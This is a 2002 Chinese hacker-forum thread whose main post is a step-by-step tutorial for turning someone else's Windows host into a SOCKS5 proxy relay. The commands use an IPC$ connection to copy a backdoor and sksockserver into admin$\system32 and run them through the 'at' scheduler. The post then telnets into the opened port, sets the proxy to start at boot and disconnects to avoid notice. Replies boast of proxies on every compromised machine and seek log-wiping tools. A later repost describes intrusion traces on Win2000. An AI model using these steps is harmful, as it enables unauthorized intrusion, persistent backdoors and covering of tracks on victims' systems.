DIY socks5跳板

>> 欢迎您， 傲气雄鹰: 重登陆 | 退出 | 注册 | 资料 | 设置 | 排行 | 新贴 | 精华 | 管理 | 帮助

首页

小榕软件实验室

刀光雪影

DIY socks5跳板

■ 回复数：23　◆ 点击数：772

将此页发给您的朋友

作者

主题: DIY socks5跳板 ( 页: 1 2 )

回复 | 收藏 | 打印 | 篇末

kane

级别：中级站友
威望：0
经验：0
货币：35
体力：

来源：广西
总发帖数：82
注册日期：2002-02-08

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

DIY socks5跳板
序：因为贴出《如何入侵能建立IPC$空衔接的主机》后，信仰2提意见说贴一些教制作跳板的，所以就有了这篇帖子：）

前提条件：找到能建立IPC空衔接的主机，如何找到请参阅《如何入侵能建立IPC$空衔接的主机》，我的主页上也有，网址是：topcoooler.51.net

需要工具：
Sksockserver.exe 下载地址：http://snake12.top263.net/SkSockServer/SkSockServer1.06.zip28KB

1: 开启CMD.EXE ，然后在流光的目录找到SRV.EXE (C:files.exe)将srv.exe拷到C目录，还有将sksockserver.exe也拷到C目录里,最好都改个名字，这样改了名字就没这么容易被发现了。现在就可以输入net use \XXX.XXX.XXX.XXX$ "密码" /user:用户名" ，如果成功的话将出现“命令完成”。
(注：NET USE \ip$ 密码 /user:用户名字)

2：将将SRV.EXE和sksockserver.exe拷到主机的SYSTEM32目录里。
命令为：
C:\srv.exe \\XXX.XXX.XXX.XXX\admin$\system32
C:\sksockserver.exe \\XXX.XXX.XXX.XXX\admin$\system32
成功拷贝的话，将会出现：“已复制 1个文件”的提示。
这个过程大概需要几分钟，等等吧：）

3：输入 net time \\XXX.XXX.XXX.XXX
这样我们就得到了主机的本地时间。

4：输入 at \\XXX.XXX.XXX.XXX 时间要运行的程式 (记得时间是用主机的本地时间，一定要输入比本地时间迟几分钟！！！这样过几分钟后该程式将自动执行，还有，时间是按照国际时间的) ，出现添加了一项作业，其作业ID-1，就表示已经增加了作业！！
如果要取消作业，输入 at \XXX.XXX.XXX.XXX ID号码 /del

5：过几分钟 , 输入 at \\XXX.XXX.XXX.XXX 查看刚才要执行任务的情况，可以看到如下内容：
状态 ID 日期时间命令行
－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－

这就表示任务已经执行了！！

6：现在可以输入 telnet XXX.XXX.XXX.XXX 99 ( 刚才执行的srv.exe就是用来打开99端口的) ！！很快的，我们将可以进入目标的电脑系统了：）
这是显示为：
C:\WINNT\system32>

7：这是键入：C:\WINNT\system32>sksockserver －install
注意：现在不会显示你已经输入的命令文字，放心，这是正常的。然后按ENTER！

8：现在来指定打开哪个端口，你可以用 1199，2001等端口，也可以按下面输入：
C:\WINNT\system32>
C:\WINNT\system32>sksockserver.exe －config port 1127
这时屏幕显示：
The Port valve set to 1127

注:可以跳过以上步骤，默认端口是1813!!!

9：这时就输入：
C:\WINNT\system32>sksockserver -config starttyte 2
屏幕显示：
The New StartType have set to 2 --Auto

这样就不怕目标重新启动系统后你的跳板就停止运行：）

10：依照下面输入，你就拥有了自己的跳板了：）
命令为：
C:\WINNT\system32>
C:\WINNT\system32>net start skserver
屏幕显示：
The Snake SockProxy Service service is starting.
The Snake SockProxy Service service was started successfully.

11：现在要离开这台主机了，连接太久容易被发现嘛：）
输入：
net use \\XXX.XXX.XXX.XXX /del
屏幕显示：
\\XXX.XXX.XXX.XXX 已经删除。

你也可以检查一下，输入：
net use
屏幕显示：
会纪录新的网络连接。

清单是空的
（如果不是这样就说明，还连着！）

12：打开，snake的代理跳板GUI版，就会看到属于你自己的跳板正在替你疯狂的冲浪：）

PS：本篇文章是本人整理tekwei的《DIY socks5》而得，如果你还不懂可以到“tekwei的主页”下载CIH版。我的主页上有他的衔接，不好意思：）是真的不记得了，我只记得：www.tekwei.org你们试试，不行的话从我网站衔接吧：）我的网址是：topcooler.51.net，上面都是菜鸟黑客教程，欢迎广大菜鸟朋友看看：）

By---KANE

----------------------------------------------------------
KANE
http://cnkane.126.com
kanezhangwei@163.com

编辑　

删除　

发表于 2002-03-11.14:33:30　

IP: 已记录

kane

级别：中级站友
威望：0
经验：0
货币：35
体力：

来源：广西
总发帖数：82
注册日期：2002-02-08

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

怎么没人看？？？

----------------------------------------------------------
KANE
http://cnkane.126.com
kanezhangwei@163.com

编辑　

删除　

发表于 2002-03-11.19:18:03　

IP: 已记录

roger_gao 帅哥哦

级别：老站友
威望：0
经验：0
货币：55
体力：

来源：203.90.1.*
总发帖数：239
注册日期：2002-03-11

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

以前看过了！这方面的文章较多！

编辑　

删除　

发表于 2002-03-11.19:20:06　

IP: 已记录

xisat

级别：高级站友
威望：0
经验：0
货币：177
体力：

来源：江西
总发帖数：103
注册日期：2002-03-06

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

看过看过
以前找这个工具都没有找到
不过我还想知道有没有其他办法能直接开sock

编辑　

删除　

发表于 2002-03-11.19:25:05　

IP: 已记录

aloner 帅哥哦

级别：长老级
威望：0
经验：0
货币：151
体力：

来源：NetxEyes
总发帖数：606
注册日期：2002-02-21

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

我的每一个肉机上都有我做的socks5
不希奇了

[ 此消息由 aloner 在 2002-03-11.19:28:22 编辑过 ]

----------------------------------------------------------
Flying...

编辑　

删除　

发表于 2002-03-11.19:25:48　

IP: 已记录

Nature 帅哥哦

级别：本站元老
威望：0
经验：0
货币：18
体力：

来源：61.190.4.*
总发帖数：1643
注册日期：2002-02-07

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

给菜鸟看看也不错啊！支持！

----------------------------------------------------------

编辑　

删除　

发表于 2002-03-11.19:28:15　

IP: 已记录

BEYOND 帅哥哦

级别：长老级
威望：0
经验：0
货币：137
体力：

来源：218.24.128.*
总发帖数：633
注册日期：2002-02-07

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

呵呵看了一完来遍了我这样的菜鸟都写过这文章啊！呵呵不过适合我这样没看过这文章的菜鸟老兄

----------------------------------------------------------
『刀』',◥◣↘╬小榕╬↙◢◤',『光』　　　　『刀』',◥◣↘╬小榕╬↙◢◤',『光』
','〃,〃◢◤　黑██客　◥◣','〃,〃　　　　　 ','〃,〃◢◤　黑██客　◥◣','〃,〃
','〃,〃◥◣红◥██◤客◢◤','〃,〃　　　　　','〃,〃◥◣红◥██◤客◢◤','〃,〃
『雪』''◢◤↗蓝◥◤客↖◥◣''『影』　　　　『雪』''◢◤↗蓝◥◤客↖◥◣''『影』

编辑　

删除　

发表于 2002-03-11.19:29:36　

IP: 已记录

xisat

级别：高级站友
威望：0
经验：0
货币：177
体力：

来源：江西
总发帖数：103
注册日期：2002-03-06

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

给我这样的菜鸟看最好拉哈……

编辑　

删除　

发表于 2002-03-11.19:32:28　

IP: 已记录

信仰II

级别：中级站友
威望：0
经验：0
货币：461
体力：

来源：云南
总发帖数：76
注册日期：2002-02-28

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

难得有心人啊！
谢！

编辑　

删除　

发表于 2002-03-11.19:59:51　

IP: 已记录

信仰II

级别：中级站友
威望：0
经验：0
货币：461
体力：

来源：云南
总发帖数：76
注册日期：2002-02-28

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

对了，关于日志处理工具除了容哥的CleanIISLog IIS还有其他的吗？能提供些吗，谢了！

编辑　

删除　

发表于 2002-03-11.20:09:23　

IP: 已记录

木头

级别：老站友
威望：0
经验：0
货币：756
体力：

来源：61.136.111.*
总发帖数：231
注册日期：2002-01-28

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

原文由 xisat 发表:
看过看过
以前找这个工具都没有找到
不过我还想知道有没有其他办法能直接开sock

我也想知道有没有其它的方法，还是能直接开的。

我讨厌死这个方法了，唉。

编辑　

删除　

发表于 2002-03-11.20:29:32　

IP: 已记录

级别：老站友
威望：0
经验：0
货币：495
体力：

来源：网络帝国
总发帖数：388
注册日期：2002-03-01

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

我不认为在有代理就可以疯狂了，，，，，，，，
用在国外还好说，要是用在国内呢，还是说明白一点好，
我才学的时候，就老是听这些没有说全的话，现在想起来总是后怕的，
在资源的原始积累时谁都会作错的，现在是不干了************************************呵呵********

----------------------------------------------------------
^_____________^灌水王来啦^______________^

编辑　

删除　

发表于 2002-03-11.20:54:47　

IP: 已记录

kane

级别：中级站友
威望：0
经验：0
货币：35
体力：

来源：广西
总发帖数：82
注册日期：2002-02-08

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

xisat,我也是菜鸟一个，所以不能回答你的问题，不好意思，不过请懂的人指点一下：）
对于清除日志，除了用CleanIISLog IIS外，还可以手工清除啊，具体的日志不太记得了，我找找看，找到就贴出来：）

----------------------------------------------------------
KANE
http://cnkane.126.com
kanezhangwei@163.com

编辑　

删除　

发表于 2002-03-11.22:17:03　

IP: 已记录

信仰II

级别：中级站友
威望：0
经验：0
货币：461
体力：

来源：云南
总发帖数：76
注册日期：2002-02-28

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

原文由 kane 发表:
xisat,我也是菜鸟一个，所以不能回答你的问题，不好意思，不过请懂的人指点一下：）
对于清除日志，除了用CleanIISLog IIS外，还可以手工清除啊，具体的日志不太记得了，我找找看，找到就贴出来：）

不管怎样还是谢谢你....
杀手的教程里提到一个clear.exe不知大家注意到没有，谁有的话给个连接...谢谢。
再次感谢kane，希望以后能多发些好的帖子给我们：）

编辑　

删除　

发表于 2002-03-11.22:41:17　

IP: 已记录

kane

级别：中级站友
威望：0
经验：0
货币：35
体力：

来源：广西
总发帖数：82
注册日期：2002-02-08

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

重贴一遍：分析进入Win2000后留下的足迹

作者：refdom

很多人对入侵Win2000系统很喜欢的吧，又有3389这样的界面型远程控制，还有这么多漏洞可以利用，而且关于入侵Win2000的文章又到处都是，方便啊。

不过，你知道，你到底留下了哪些足迹在系统中么？最近作了个入侵分析，发现了不少东西，当然，估计到入侵时间然后在查找文件就列出来了。我们在这里不分析来自FTP、HTTP的日志记录，因为这样来的入侵行为分析和防范比较容易，而通过帐号密码猜测进来的防范起来是比较麻烦的（安全配置相当OK的另说）。

1、系统的日志记录。
好的管理员应该尽可能地记录可以记录的东西，在本地安全策略中，对审核策略进行足够多的记录，你能发现，如果把所有的审核都选定的话（只要你不嫌多），一个帐号进行的操作访问的整个过程都能够完整记录下来了，一点不漏。
事件查看器里记录的内容是最多的了，从安全日志里面可以查看所有审核的事件。
我们看看一个帐号的登录/注销事件的记录：

会话从 winstation 中断连接:
用户名: guest
域: Refdom
登录 ID: (0x0,0x28445D9)
会话名称: Unknown
客户端名: GUDULOVER
客户端地址: 202.103.117.94

这是一个3389登录的事件，系统记录下了IP地址，机器名称以及使用的用户名。还是很齐全的吧。

这是一个详细追踪的记录：

已经创建新的过程:
新的过程 ID: 4269918848
映象文件名: \WINNT\system32\CMD.EXE
创建者过程 ID: 2168673888
用户名: Refdom$
域: Refdom
登录 ID: (0x0,0x3E7)

这是使用localsystem来运行了cmd.exe的记录，呵呵，用本地系统帐号运行cmd.exe不是用net user还是什么（当然还能做很多事情）。
小心自己的日志记录太多，日志空间使用满，这样WIN就不再记录新的事件了，请在日志属性中选择按需要改写日志，这样可以记录新的事件，不过可能把需要分析的事件给改写了。
可惜的是，这里的记录实在是太显眼了，多半存活不了。

2、足够多的痕迹留在“Documents and Settings”目录里面
这个目录是所有帐号的足迹存放地，当然，从3389或者本机进入使用图形界面就会留下帐号目录来。我们来看看一个帐号的“Documents and Settings”目录里面有什么东西吧，首先查看所有文件和文件夹，不要隐藏任何东西。

“「开始」菜单”：当然是存放帐号自己的“开始”中的东西，这个里面的“启动”是个比较好东西哦。
“Application Data”：一些应用程序留下的数据啊、备份啊什么的东西，分析用处不怎么大。
“Cookies”：如果入侵者通过3389进来，还去浏览了网页，那么这里就存放着足够多的Cookie，让你能够知道他到底去了哪些地方。
“Local Settings”，这里也是一些临时数据的存放地，还有就是IE的脱机东东。说不定能发现很多好网站哦。
“Recent”：这个文件夹是隐藏的，不过里面存放的东西实在太多了，帐号访问的目录、文件一个一个都记录在案。使用了哪些东西，看了哪些文件，都能知道得清清楚楚。
“Templates”：存放临时文件的地方。

3、从黑客工具看
被人入侵了，那他一定会想办法获得administrator权限，得到了这个权限他就能为所欲为了，按照各种介绍的入侵教材，当然是放置其他扫描器做肉鸡、安装后门、删除日志……呵呵，这些扫描器都有足够的日志可以提供分析，还能帮自己白白收集一些肉鸡。而且从这些工具的日志（配置文件）里面也可以看出入侵者的意图以及水平等等。
也好，那流光来说吧，每次扫描的结果都写下来了，大家都可以看，不看白不看。
被安装后门、代理跳板（不是多级）是最好的了，谁能远程控制你做什么呢？我们当然可以从后门程序抓住入侵者的来历，从哪里传过来的连接，用嗅叹器就是了，当然，你甚至可以用一个非常有意思的文件名来伪装自己的木马，让他当回去使用，想玩大家一起玩啊。当然，从另外的3389肉鸡这样的控制来的入侵者还是只找到的他的肉鸡而已。（冒险，把他的肉鸡也搞定吧）

----------------------------------------------------------
KANE
http://cnkane.126.com
kanezhangwei@163.com

编辑　

删除　

发表于 2002-03-12.23:54:23　

IP: 已记录

xisat

级别：高级站友
威望：0
经验：0
货币：177
体力：

来源：江西
总发帖数：103
注册日期：2002-03-06

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

我以前就很想问。当我连接上一台主机后我怎么知道我是否安全呢？怎么知道自己有没有被管理员监视？？

编辑　

删除　

发表于 2002-03-13.00:04:22　

IP: 已记录

选择回复

快速回复主题：	>>>高级模式
	用户名：没有注册？　密码：忘记密码？
记住密码 HTML语法禁止IDB代码禁止表情字符	[按 Ctrl+Enter 快捷键可直接提交帖子]
投票评分：	共 0 票

所有时间均为: 北京时间

↑TOP [第 1 2 页]